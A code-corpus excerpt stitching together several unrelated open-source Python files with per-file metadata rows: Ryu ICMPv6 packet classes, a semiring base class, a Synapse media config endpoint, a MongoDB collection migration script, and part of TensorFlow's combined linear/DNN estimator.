ryu.lib.packet.icmpv6.nd_option_la object, \
ryu.lib.packet.icmpv6.nd_option_pi object \
or a bytearray.
============== ====================
"""
_PACK_STR = '!BBHII'
_MIN_LEN = struct.calcsize(_PACK_STR)
_ND_OPTION_TYPES = {}
# ND option type
ND_OPTION_SLA = 1 # Source Link-Layer Address
ND_OPTION_PI = 3 # Prefix Information
ND_OPTION_MTU = 5 # MTU
@staticmethod
def register_nd_option_type(*args):
def _register_nd_option_type(cls):
for type_ in args:
nd_router_advert._ND_OPTION_TYPES[type_] = cls
return cls
return _register_nd_option_type
def __init__(self, ch_l, res, rou_l, rea_t, ret_t, type_=None, length=None,
data=None):
self.ch_l = ch_l
self.res = res << 6
self.rou_l = rou_l
self.rea_t = rea_t
self.ret_t = ret_t
self.type_ = type_
self.length = length
self.data = data
@classmethod
def parser(cls, buf, offset):
(ch_l, res, rou_l, rea_t, ret_t) = struct.unpack_from(cls._PACK_STR,
buf, offset)
msg = cls(ch_l, res >> 6, rou_l, rea_t, ret_t)
offset += cls._MIN_LEN
msg.type_ = list()
msg.length = list()
msg.data = list()
while len(buf) > offset:
(type_, length) = struct.unpack_from('!BB', buf, offset)
msg.type_.append(type_)
msg.length.append(length)
cls_ = cls._ND_OPTION_TYPES.get(type_, None)
offset += 2
if cls_:
msg.data.append(cls_.parser(buf[:offset+cls_._MIN_LEN],
offset))
offset += cls_._MIN_LEN
else:
msg.data.append(buf[offset:])
offset = len(buf)
return msg
def serialize(self):
hdr = bytearray(struct.pack(nd_router_advert._PACK_STR, self.ch_l,
self.res, self.rou_l, self.rea_t,
self.ret_t))
if self.type_ is not None:
for i in range(len(self.type_)):
hdr += bytearray(struct.pack('!BB', self.type_[i],
self.length[i]))
if self.type_[i] in nd_router_advert._ND_OPTION_TYPES:
hdr += self.data[i].serialize()
elif self.data[i] is not None:
hdr += bytearray(self.data[i])
return hdr
@nd_neighbor.register_nd_option_type(nd_neighbor.ND_OPTION_SLA,
nd_neighbor.ND_OPTION_TLA)
@nd_router_solicit.register_nd_option_type(nd_router_solicit.ND_OPTION_SLA)
@nd_router_advert.register_nd_option_type(nd_router_advert.ND_OPTION_SLA)
class nd_option_la(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Neighbor discovery
Source/Target Link-Layer Address Option. (RFC 4861)
This is used with ryu.lib.packet.icmpv6.nd_neighbor,
ryu.lib.packet.icmpv6.nd_router_solicit or
ryu.lib.packet.icmpv6.nd_router_advert.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the correspondig args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
hw_src Link-Layer Address. \
NOTE: If the address is longer than 6 octets this contains \
the first 6 octets in the address. \
This implementation assumes the address has at least \
6 octets.
data A bytearray which contains the rest of Link-Layer Address \
and padding. When encoding a packet, it's user's \
responsibility to provide necessary padding for 8-octets \
alignment required by the protocol.
============== ====================
"""
_PACK_STR = '!6s'
_MIN_LEN = struct.calcsize(_PACK_STR)
def __init__(self, hw_src, data=None):
self.hw_src = hw_src
self.data = data
@classmethod
def parser(cls, buf, offset):
(hw_src, ) = struct.unpack_from(cls._PACK_STR, buf, offset)
msg = cls(addrconv.mac.bin_to_text(hw_src))
offset += cls._MIN_LEN
if len(buf) > offset:
msg.data = buf[offset:]
return msg
def serialize(self):
hdr = bytearray(struct.pack(self._PACK_STR,
addrconv.mac.text_to_bin(self.hw_src)))
if self.data is not None:
hdr += bytearray(self.data)
return hdr
@nd_router_advert.register_nd_option_type(nd_router_advert.ND_OPTION_PI)
class nd_option_pi(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Neighbor discovery
Prefix Information Option. (RFC 4861)
This is used with ryu.lib.packet.icmpv6.nd_router_advert.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the correspondig args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
pl Prefix Length.
res1 L,A,R\* Flags for Prefix Information.
val_l Valid Lifetime.
pre_l Preferred Lifetime.
res2 This field is unused. It MUST be initialized to zero.
prefix An IP address or a prefix of an IP address.
============== ====================
\*R flag is defined in (RFC 3775)
"""
_PACK_STR = '!BBIII16s'
_MIN_LEN = struct.calcsize(_PACK_STR)
def __init__(self, pl, res1, val_l, pre_l, res2, prefix):
self.pl = pl
self.res1 = res1 << 5
self.val_l = val_l
self.pre_l = pre_l
self.res2 = res2
self.prefix = prefix
@classmethod
def parser(cls, buf, offset):
(pl, res1, val_l, pre_l, res2, prefix) = struct.unpack_from(cls.
_PACK_STR,
buf,
offset)
msg = cls(pl, res1 >> 5, val_l, pre_l, res2,
addrconv.ipv6.bin_to_text(prefix))
return msg
def serialize(self):
hdr = bytearray(struct.pack(self._PACK_STR, self.pl, self.res1,
self.val_l, self.pre_l, self.res2,
addrconv.ipv6.text_to_bin(self.prefix)))
return hdr
@icmpv6.register_icmpv6_type(ICMPV6_ECHO_REPLY, ICMPV6_ECHO_REQUEST)
class echo(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Echo Request and Echo Reply
messages.
This is used with ryu.lib.packet.icmpv6.icmpv6 for
ICMPv6 Echo Request and Echo Reply messages.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the correspondig args in this order.
============== ====================
Attribute Description
============== ====================
id Identifier
seq Sequence Number
data Data
============== ====================
"""
_PACK_STR = '!HH'
_MIN_LEN = struct.calcsize(_PACK_STR)
def __init__(self, id_, seq, data=None):
self.id = id_
self.seq = seq
self.data = data
@classmethod
def parser(cls, buf, offset):
(id_, seq) = struct.unpack_from(cls._PACK_STR, buf, offset)
msg = cls(id_, seq)
offset += cls._MIN_LEN
if len(buf) > offset:
msg.data = buf[offset:]
return msg
def serialize(self):
hdr = bytearray(struct.pack(echo._PACK_STR, self.id,
self.seq))
if self.data is not None:
hdr += bytearray(self.data)
return hdr
| apache-2.0 | -3,966,669,144,491,497,000 | 34.08363 | 79 | 0.549171 | false | 3.829287 | false | false | false |
sdynerow/Semirings-Library | python/Metarouting/Algebra/Semiring.py | 2 | 2021 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012 - Seweryn Dynerowicz, FUNDP.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# imitations under the License.
class Semiring:
zeroElt = None
unitElt = None
def __init__(self, val):
self.elt = val
def __add__(self, other):
raise NotImplementedError("Additive law not implemented.")
def __mul__(self, other):
raise NotImplementedError("Multiplicative law not implemented.")
def __le__(self, other): # <=
raise NotImplementedError("Canonical preorder relation not specified.")
def __lt__(self, other): # <
return (self <= other and self != other)
def __ge__(self, other):
return (other <= self)
def __gt__(self, other):
return (other < self)
def __eq__(self, other):
return (self.elt == other.elt)
def __ne__(self, other):
return (not self.elt == other.elt)
# Representation related stuff
def __repr__(self):
raise NotImplementedError("Representation not specified.")
# Power operator (not square-and-multiply)
def __pow__(self, p):
rPow = p
res = self.unit()
while(rPow > 0):
res = res * self
rPow -= 1
return res
def isZero(self):
return self.elt == self.zeroElt
def isUnit(self):
return self.elt == self.unitElt
@classmethod
def zero(cls):
return cls(cls.zeroElt)
@classmethod
def unit(cls):
return cls(cls.unitElt)
| apache-2.0 | -7,328,780,655,527,917,000 | 26.310811 | 87 | 0.619 | false | 3.924272 | false | false | false |
matrix-org/synapse | synapse/rest/media/v1/config_resource.py | 1 | 1540 | # Copyright 2018 Will Hunt <[email protected]>
# Copyright 2020-2021 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import TYPE_CHECKING
from twisted.web.server import Request
from synapse.http.server import DirectServeJsonResource, respond_with_json
from synapse.http.site import SynapseRequest
if TYPE_CHECKING:
from synapse.server import HomeServer
class MediaConfigResource(DirectServeJsonResource):
isLeaf = True
def __init__(self, hs: "HomeServer"):
super().__init__()
config = hs.config
self.clock = hs.get_clock()
self.auth = hs.get_auth()
self.limits_dict = {"m.upload.size": config.max_upload_size}
async def _async_render_GET(self, request: SynapseRequest) -> None:
await self.auth.get_user_by_req(request)
respond_with_json(request, 200, self.limits_dict, send_cors=True)
async def _async_render_OPTIONS(self, request: Request) -> None:
respond_with_json(request, 200, {}, send_cors=True)
| apache-2.0 | 5,197,898,967,068,174,000 | 34.813953 | 74 | 0.718831 | false | 3.684211 | false | false | false |
shaneneuerburg/cgrates | data/scripts/migrator/dbsmerge_mongo.py | 3 | 3374 | #!/usr/bin/python
# depends:
# ^ pymongo # install via: easy_install pymongo
# behaviour:
# ^ the script will "move" the collections if source and target server are the same
# but will "copy" (dump/restore) if source and target servers are different
from_host = '127.0.0.1'
from_port = '27017'
from_db = '11'
from_auth_db = 'cgrates' # Auth db on source server
from_user = 'cgrates'
from_pass = ''
to_host = '127.0.0.1'
to_port = '27017'
to_db = '10'
to_auth_db = "cgrates" # Auth db on target server
to_user = 'cgrates'
to_pass = ''
ignore_empty_cols = True
# Do not migrate collections with 0 document count.
# Works only if from/to is on same host.
# Overwrite target collections flag.
# Works only if from/to is on same host.
# If from/to hosts are different we use mongorestore which overwrites by default.
drop_target = False
dump_folder = 'dump'
import sys
from pymongo import MongoClient
from urllib import quote_plus
from collections import OrderedDict
# same server
if from_host == to_host and from_port == to_port:
print('Migrating on same server...')
mongo_from_url = 'mongodb://' + from_user + ':' + quote_plus(from_pass) + '@'+ from_host + ':' + from_port + '/' + from_auth_db
if from_pass == '': # disabled auth
mongo_from_url = 'mongodb://' + from_host + ':' + from_port + '/' + from_db
client = MongoClient(mongo_from_url)
db = client[from_db]
cols = db.collection_names()
# collections found
if len(cols) > 0:
print('Found %d collections on source. Moving...' % len(cols))
i = 0
for col in cols:
i += 1
if not ignore_empty_cols or (ignore_empty_cols and db[col].count() > 0):
print('Moving collection %s (%d of %d)...' % (col, i, len(cols)))
try:
client.admin.command(OrderedDict([('renameCollection', from_db + '.' + col), ('to', to_db + '.' + col), ('dropTarget', drop_target)]))
except:
e = sys.exc_info()[0]
print(e)
else:
print('Skipping empty collection %s (%d of %d)...' % (col, i, len(cols)))
# no collections found
else:
print('No collections in source database.')
# different servers
else:
import subprocess
import os
import shutil
print('Migrating between different servers...')
print('Dumping...')
out = subprocess.check_output([
'mongodump',
'--host', '%s' % from_host,
'-u', '%s' % from_user,
'-p', '%s' % from_pass,
'--authenticationDatabase', '%s' % from_auth_db,
'--db', '%s' % from_db,
'--port', '%s' % from_port,
'-o', '%s' % dump_folder,
], stderr= subprocess.STDOUT)
print('Dump complete.')
print('Restoring...')
out = subprocess.check_output([
'mongorestore',
'--host', '%s' % to_host,
'-u', '%s' % to_user,
'-p', '%s' % to_pass,
'--authenticationDatabase', '%s' % to_auth_db,
'--db', '%s' % to_db,
'--port', '%s' % to_port,
'--drop', '%s/%s' % (dump_folder, from_db),
], stderr= subprocess.STDOUT)
print('Restore complete.')
print('Migration complete.')
| gpl-3.0 | 1,611,922,954,929,420,300 | 32.405941 | 158 | 0.54594 | false | 3.525601 | false | false | false |
kyubifire/softlayer-python | SoftLayer/CLI/dedicatedhost/create.py | 4 | 3969 | """Order/create a dedicated Host."""
# :license: MIT, see LICENSE for more details.
import click
import SoftLayer
from SoftLayer.CLI import environment
from SoftLayer.CLI import exceptions
from SoftLayer.CLI import formatting
from SoftLayer.CLI import template
@click.command(
epilog="See 'slcli dedicatedhost create-options' for valid options.")
@click.option('--hostname', '-H',
help="Host portion of the FQDN",
required=True,
prompt=True)
@click.option('--router', '-r',
help="Router hostname ex. fcr02a.dal13",
show_default=True)
@click.option('--domain', '-D',
help="Domain portion of the FQDN",
required=True,
prompt=True)
@click.option('--datacenter', '-d', help="Datacenter shortname",
required=True,
prompt=True)
@click.option('--flavor', '-f', help="Dedicated Virtual Host flavor",
required=True,
prompt=True)
@click.option('--billing',
type=click.Choice(['hourly', 'monthly']),
default='hourly',
show_default=True,
help="Billing rate")
@click.option('--verify',
is_flag=True,
help="Verify dedicatedhost without creating it.")
@click.option('--template', '-t',
is_eager=True,
callback=template.TemplateCallback(list_args=['key']),
help="A template file that defaults the command-line options",
type=click.Path(exists=True, readable=True, resolve_path=True))
@click.option('--export',
type=click.Path(writable=True, resolve_path=True),
help="Exports options to a template file")
@environment.pass_env
def cli(env, **kwargs):
"""Order/create a dedicated host."""
mgr = SoftLayer.DedicatedHostManager(env.client)
order = {
'hostname': kwargs['hostname'],
'domain': kwargs['domain'],
'flavor': kwargs['flavor'],
'location': kwargs['datacenter'],
'hourly': kwargs.get('billing') == 'hourly',
}
if kwargs['router']:
order['router'] = kwargs['router']
do_create = not (kwargs['export'] or kwargs['verify'])
output = None
result = mgr.verify_order(**order)
table = formatting.Table(['Item', 'cost'])
table.align['Item'] = 'r'
table.align['cost'] = 'r'
if len(result['prices']) != 1:
raise exceptions.ArgumentError("More than 1 price was found or no "
"prices found")
price = result['prices']
if order['hourly']:
total = float(price[0].get('hourlyRecurringFee', 0.0))
else:
total = float(price[0].get('recurringFee', 0.0))
if order['hourly']:
table.add_row(['Total hourly cost', "%.2f" % total])
else:
table.add_row(['Total monthly cost', "%.2f" % total])
output = []
output.append(table)
output.append(formatting.FormattedItem(
'',
' -- ! Prices reflected here are retail and do not '
'take account level discounts and are not guaranteed.'))
if kwargs['export']:
export_file = kwargs.pop('export')
template.export_to_template(export_file, kwargs,
exclude=['wait', 'verify'])
env.fout('Successfully exported options to a template file.')
if do_create:
if not env.skip_confirmations and not formatting.confirm(
"This action will incur charges on your account. "
"Continue?"):
raise exceptions.CLIAbort('Aborting dedicated host order.')
result = mgr.place_order(**order)
table = formatting.KeyValueTable(['name', 'value'])
table.align['name'] = 'r'
table.align['value'] = 'l'
table.add_row(['id', result['orderId']])
table.add_row(['created', result['orderDate']])
output.append(table)
env.fout(output)
| mit | -9,193,515,461,802,948,000 | 33.815789 | 77 | 0.580499 | false | 4.112953 | false | false | false |
rgreinho/docker-django-cookiecutter | {{ cookiecutter.project_name }}/docs/source/conf.py | 1 | 2818 | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.coverage', 'sphinx.ext.viewcode', ]
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'{{ cookiecutter.project_name }}'
copyright = u'{{ cookiecutter.year }}, {{ cookiecutter.author }}'
version = u'{{ cookiecutter.version }}'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [('index', '%s.tex' % project, u'%s Documentation' % project, u'OpenStack Foundation', 'manual'), ]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
| mit | -603,125,598,092,764,400 | 38.690141 | 117 | 0.702626 | false | 3.818428 | false | false | false |
mrry/tensorflow | tensorflow/contrib/learn/python/learn/estimators/dnn_linear_combined.py | 3 | 29937 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorFlow estimators for Linear and DNN joined training models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib import layers
from tensorflow.contrib.framework import deprecated
from tensorflow.contrib.framework import deprecated_arg_values
from tensorflow.contrib.framework.python.ops import variables as contrib_variables
from tensorflow.contrib.layers.python.layers import feature_column_ops
from tensorflow.contrib.learn.python.learn.estimators import composable_model
from tensorflow.contrib.learn.python.learn.estimators import estimator
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import training
def _changing_default_center_bias():
logging.warn(
"Change warning: default value of `enable_centered_bias` will change"
" after 2016-10-09. It will be disabled by default."
"Instructions for keeping existing behaviour:\n"
"Explicitly set `enable_centered_bias` to 'True' if you want to keep "
"existing behaviour.")
# TODO(ispir): Increase test coverage
class _DNNLinearCombinedBaseEstimator(estimator.BaseEstimator):
"""An estimator for TensorFlow Linear and DNN joined training models.
Input of `fit`, `train`, and `evaluate` should have following features,
otherwise there will be a `KeyError`:
if `weight_column_name` is not `None`, a feature with
`key=weight_column_name` whose value is a `Tensor`.
for each `column` in `dnn_feature_columns` + `linear_feature_columns`:
- if `column` is a `SparseColumn`, a feature with `key=column.name`
whose `value` is a `SparseTensor`.
- if `column` is a `WeightedSparseColumn`, two features: the first with
`key` the id column name, the second with `key` the weight column
name. Both features' `value` must be a `SparseTensor`.
- if `column` is a `RealValuedColumn, a feature with `key=column.name`
whose `value` is a `Tensor`.
"""
def __init__(self, # _joint_linear_weights pylint: disable=invalid-name
target_column,
model_dir=None,
linear_feature_columns=None,
linear_optimizer=None,
_joint_linear_weights=False,
dnn_feature_columns=None,
dnn_optimizer=None,
dnn_hidden_units=None,
dnn_activation_fn=nn.relu,
dnn_dropout=None,
gradient_clip_norm=None,
enable_centered_bias=True,
config=None,
feature_engineering_fn=None):
"""Initializes a _DNNLinearCombinedBaseEstimator instance.
Args:
target_column: A _TargetColumn object.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator
to continue training a previously saved model.
linear_feature_columns: An iterable containing all the feature columns
used by linear part of the model. All items in the set should be
instances of classes derived from `FeatureColumn`.
linear_optimizer: An instance of `tf.Optimizer` used to apply gradients to
the linear part of the model. If `None`, will use a FTRL optimizer.
_joint_linear_weights: If True will use a single (possibly partitioned)
variable to store all weights for the linear model. More efficient if
there are many columns, however requires all columns are sparse and
have the 'sum' combiner.
dnn_feature_columns: An iterable containing all the feature columns used
by deep part of the model. All items in the set should be instances of
classes derived from `FeatureColumn`.
dnn_optimizer: An instance of `tf.Optimizer` used to apply gradients to
the deep part of the model. If `None`, will use an Adagrad optimizer.
dnn_hidden_units: List of hidden units per layer. All layers are fully
connected.
dnn_activation_fn: Activation function applied to each layer. If `None`,
will use `tf.nn.relu`.
dnn_dropout: When not None, the probability we will drop out
a given coordinate.
gradient_clip_norm: A float > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
tf.clip_by_global_norm for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
config: RunConfig object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
targets which are the output of `input_fn` and
returns features and targets which will be fed
into the model.
Raises:
ValueError: If both linear_feature_columns and dnn_features_columns are
empty at the same time.
"""
super(_DNNLinearCombinedBaseEstimator, self).__init__(
model_dir=model_dir, config=config)
num_ps_replicas = config.num_ps_replicas if config else 0
self._linear_model = composable_model.LinearComposableModel(
num_label_columns=target_column.num_label_columns,
optimizer=linear_optimizer,
_joint_weights=_joint_linear_weights,
gradient_clip_norm=gradient_clip_norm,
num_ps_replicas=num_ps_replicas)
self._dnn_model = composable_model.DNNComposableModel(
num_label_columns=target_column.num_label_columns,
hidden_units=dnn_hidden_units,
optimizer=dnn_optimizer,
activation_fn=dnn_activation_fn,
dropout=dnn_dropout,
gradient_clip_norm=gradient_clip_norm,
num_ps_replicas=num_ps_replicas) if dnn_hidden_units else None
self._linear_feature_columns = linear_feature_columns
self._linear_optimizer = linear_optimizer
self._dnn_feature_columns = dnn_feature_columns
self._dnn_hidden_units = dnn_hidden_units
self._centered_bias_weight_collection = "centered_bias"
self._enable_centered_bias = enable_centered_bias
self._target_column = target_column
self._feature_engineering_fn = (
feature_engineering_fn or
(lambda features, targets: (features, targets)))
@property
@deprecated("2016-10-30",
"This method will be removed after the deprecation date. "
"To inspect variables, use get_variable_names() and "
"get_variable_value().")
def linear_weights_(self):
"""Returns weights per feature of the linear part."""
return self._linear_model.get_weights(model_dir=self._model_dir)
@property
@deprecated("2016-10-30",
"This method will be removed after the deprecation date. "
"To inspect variables, use get_variable_names() and "
"get_variable_value().")
def linear_bias_(self):
"""Returns bias of the linear part."""
return (self._linear_model.get_bias(model_dir=self._model_dir) +
self.get_variable_value("centered_bias_weight"))
@property
@deprecated("2016-10-30",
"This method will be removed after the deprecation date. "
"To inspect variables, use get_variable_names() and "
"get_variable_value().")
def dnn_weights_(self):
"""Returns weights of deep neural network part."""
return self._dnn_model.get_weights(model_dir=self._model_dir)
@property
@deprecated("2016-10-30",
"This method will be removed after the deprecation date. "
"To inspect variables, use get_variable_names() and "
"get_variable_value().")
def dnn_bias_(self):
"""Returns bias of deep neural network part."""
return (self._dnn_model.get_bias(model_dir=self._model_dir) +
[self.get_variable_value("centered_bias_weight")])
def _get_target_column(self):
"""Returns the target column of this Estimator."""
return self._target_column
def _get_feature_dict(self, features):
if isinstance(features, dict):
return features
return {"": features}
def _get_train_ops(self, features, targets):
"""See base class."""
global_step = contrib_variables.get_global_step()
assert global_step
features = self._get_feature_dict(features)
features, targets = self._feature_engineering_fn(features, targets)
logits = self._logits(features, is_training=True)
if self._enable_centered_bias:
centered_bias_step = [self._centered_bias_step(targets, features)]
else:
centered_bias_step = []
with ops.control_dependencies(centered_bias_step):
training_loss = self._target_column.training_loss(logits, targets,
features)
weighted_average_loss = self._target_column.loss(logits, targets,
features)
logging_ops.scalar_summary("loss", weighted_average_loss)
linear_train_step = self._linear_model.get_train_step(training_loss)
dnn_train_step = (self._dnn_model.get_train_step(training_loss) if
self._dnn_model else [])
with ops.control_dependencies(linear_train_step + dnn_train_step):
with ops.get_default_graph().colocate_with(global_step):
return state_ops.assign_add(global_step, 1).op, weighted_average_loss
def _get_eval_ops(self, features, targets, metrics=None):
"""See base class."""
features = self._get_feature_dict(features)
features, targets = self._feature_engineering_fn(features, targets)
logits = self._logits(features)
return self._target_column.get_eval_ops(features, logits, targets, metrics)
def _get_predict_ops(self, features):
"""See base class."""
features = self._get_feature_dict(features)
features, _ = self._feature_engineering_fn(features, None)
logits = self._logits(features)
return self._target_column.logits_to_predictions(logits, proba=True)
@deprecated(
"2016-09-23",
"The signature of the input_fn accepted by export is changing to be "
"consistent with what's used by tf.Learn Estimator's train/evaluate, "
"which makes this function useless. This will be removed after the "
"deprecation date.")
def _get_feature_ops_from_example(self, examples_batch):
column_types = layers.create_feature_spec_for_parsing((
self._get_linear_feature_columns() or []) + (
self._get_dnn_feature_columns() or []))
features = parsing_ops.parse_example(examples_batch, column_types)
return features
def _get_linear_feature_columns(self):
if not self._linear_feature_columns:
return None
feature_column_ops.check_feature_columns(self._linear_feature_columns)
return sorted(set(self._linear_feature_columns), key=lambda x: x.key)
def _get_dnn_feature_columns(self):
if not self._dnn_feature_columns:
return None
feature_column_ops.check_feature_columns(self._dnn_feature_columns)
return sorted(set(self._dnn_feature_columns), key=lambda x: x.key)
def _dnn_logits(self, features, is_training):
return self._dnn_model.build_model(
features, self._dnn_feature_columns, is_training)
def _linear_logits(self, features, is_training):
return self._linear_model.build_model(
features, self._linear_feature_columns, is_training)
def _centered_bias(self):
centered_bias = variables.Variable(
array_ops.zeros([self._target_column.num_label_columns]),
collections=[self._centered_bias_weight_collection,
ops.GraphKeys.VARIABLES],
name="centered_bias_weight")
logging_ops.scalar_summary(
["centered_bias_%d" % cb for cb in range(
self._target_column.num_label_columns)],
array_ops.reshape(centered_bias, [-1]))
return centered_bias
def _centered_bias_step(self, targets, features):
centered_bias = ops.get_collection(self._centered_bias_weight_collection)
batch_size = array_ops.shape(targets)[0]
logits = array_ops.reshape(
array_ops.tile(centered_bias[0], [batch_size]),
[batch_size, self._target_column.num_label_columns])
with ops.name_scope(None, "centered_bias", (targets, features)):
training_loss = self._target_column.training_loss(
logits, targets, features)
# Learn central bias by an optimizer. 0.1 is a convervative lr for a
# single variable.
return training.AdagradOptimizer(0.1).minimize(
training_loss, var_list=centered_bias)
def _logits(self, features, is_training=False):
linear_feature_columns = self._get_linear_feature_columns()
dnn_feature_columns = self._get_dnn_feature_columns()
if not (linear_feature_columns or dnn_feature_columns):
raise ValueError("Either linear_feature_columns or dnn_feature_columns "
"should be defined.")
if linear_feature_columns and dnn_feature_columns:
logits = (self._linear_logits(features, is_training) +
self._dnn_logits(features, is_training))
elif dnn_feature_columns:
logits = self._dnn_logits(features, is_training)
else:
logits = self._linear_logits(features, is_training)
if self._enable_centered_bias:
return nn.bias_add(logits, self._centered_bias())
else:
return logits
class DNNLinearCombinedClassifier(_DNNLinearCombinedBaseEstimator):
"""A classifier for TensorFlow Linear and DNN joined training models.
Example:
```python
education = sparse_column_with_hash_bucket(column_name="education",
hash_bucket_size=1000)
occupation = sparse_column_with_hash_bucket(column_name="occupation",
hash_bucket_size=1000)
education_x_occupation = crossed_column(columns=[education, occupation],
hash_bucket_size=10000)
education_emb = embedding_column(sparse_id_column=education, dimension=16,
combiner="sum")
occupation_emb = embedding_column(sparse_id_column=occupation, dimension=16,
combiner="sum")
estimator = DNNLinearCombinedClassifier(
# common settings
n_classes=n_classes,
weight_column_name=weight_column_name,
# wide settings
linear_feature_columns=[education_x_occupation],
linear_optimizer=tf.train.FtrlOptimizer(...),
# deep settings
dnn_feature_columns=[education_emb, occupation_emb],
dnn_hidden_units=[1000, 500, 100],
dnn_optimizer=tf.train.AdagradOptimizer(...))
# Input builders
def input_fn_train: # returns x, y
...
def input_fn_eval: # returns x, y
...
estimator.fit(input_fn=input_fn_train)
estimator.evaluate(input_fn=input_fn_eval)
estimator.predict(x=x)
```
Input of `fit` and `evaluate` should have following features,
otherwise there will be a `KeyError`:
if `weight_column_name` is not `None`, a feature with
`key=weight_column_name` whose value is a `Tensor`.
for each `column` in `dnn_feature_columns` + `linear_feature_columns`:
- if `column` is a `SparseColumn`, a feature with `key=column.name`
whose `value` is a `SparseTensor`.
- if `column` is a `WeightedSparseColumn`, two features: the first with
`key` the id column name, the second with `key` the weight column name.
Both features' `value` must be a `SparseTensor`.
- if `column` is a `RealValuedColumn, a feature with `key=column.name`
whose `value` is a `Tensor`.
"""
def __init__(self, # _joint_linear_weights pylint: disable=invalid-name
model_dir=None,
n_classes=2,
weight_column_name=None,
linear_feature_columns=None,
linear_optimizer=None,
_joint_linear_weights=False,
dnn_feature_columns=None,
dnn_optimizer=None,
dnn_hidden_units=None,
dnn_activation_fn=nn.relu,
dnn_dropout=None,
gradient_clip_norm=None,
enable_centered_bias=None,
config=None,
feature_engineering_fn=None):
"""Constructs a DNNLinearCombinedClassifier instance.
Args:
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator
to continue training a previously saved model.
n_classes: number of target classes. Default is binary classification.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training.
It will be multiplied by the loss of the example.
linear_feature_columns: An iterable containing all the feature columns
used by linear part of the model. All items in the set must be
instances of classes derived from `FeatureColumn`.
linear_optimizer: An instance of `tf.Optimizer` used to apply gradients to
the linear part of the model. If `None`, will use a FTRL optimizer.
_joint_linear_weights: If True a single (possibly partitioned) variable
will be used to store the linear model weights. It's faster, but
requires all columns are sparse and have the 'sum' combiner.
dnn_feature_columns: An iterable containing all the feature columns used
by deep part of the model. All items in the set must be instances of
classes derived from `FeatureColumn`.
dnn_optimizer: An instance of `tf.Optimizer` used to apply gradients to
the deep part of the model. If `None`, will use an Adagrad optimizer.
